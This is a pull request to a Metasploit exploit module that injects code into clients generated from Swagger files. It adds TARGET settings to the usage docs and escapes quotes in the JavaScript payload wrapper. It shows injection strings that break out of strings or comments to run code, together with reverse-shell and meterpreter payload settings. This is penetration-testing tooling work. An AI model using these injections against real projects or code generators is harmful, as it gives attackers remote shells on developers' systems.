### PR TITLE
Fixes & documentation for swagger_param_inject

### DIFF
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md
+++ b/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md
@@ -33,6 +33,7 @@ This attack injects a payload into javascript by terminating a URL path string.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 0
 set PAYLOAD nodejs/shell_reverse_tcp
 set INFO_VERSION "1.0.0"
 set SWAGGER_HOST "localhost"
@@ -47,6 +48,7 @@ This attack injects a payload into PHP multiline comment area.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 1
 set PAYLOAD php/meterpreter/reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 
@@ -60,6 +62,7 @@ This attack injects a payload into ruby multiline comment area.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 3
 set PAYLOAD ruby/shell_reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 
@@ -73,6 +76,7 @@ This attack injects a payload into Java by terminating a URL path string.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 2
 set PAYLOAD java/jsp_shell_reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 

--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -7,7 +7,7 @@
 # Gems
 #
 require 'base64'
-require 'pry'
+
 #
 # Project
 #

--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -7,7 +7,7 @@
 # Gems
 #
 require 'base64'
-
+require 'pry'
 #
 # Project
 #
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_loc = 'PATH'
       payload_prefix = "/a');};};return exports;}));"
       payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
-      wrapped_payload = payload_prefix + payload.encoded + payload_suffix
+      wrapped_payload = payload_prefix + payload.encoded.gsub(/"/, '\\"') + payload_suffix
     when 'php'
       payload_loc = 'INFO_DESCRIPTION'
       payload_prefix = "*/ namespace foobar; eval(base64_decode('"


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/fileformat/swagger_param_inject`
- [x] `set LHOST localhost`
- [x] `set LPORT 4444`
- [x] `set SWAGGER_HOST localhost`
- [x] `set TARGET 0`
- [x] `set PAYLOAD nodejs/shell_reverse_tcp`
- [x] `run`
- [x] **Verify** the resultant msf-swagger.json is indeed valid JSON.  (not invalid JSON)
- [x] **Verify** documentation looks suitable 
- [x] **Verify** the thing does not do what it should not
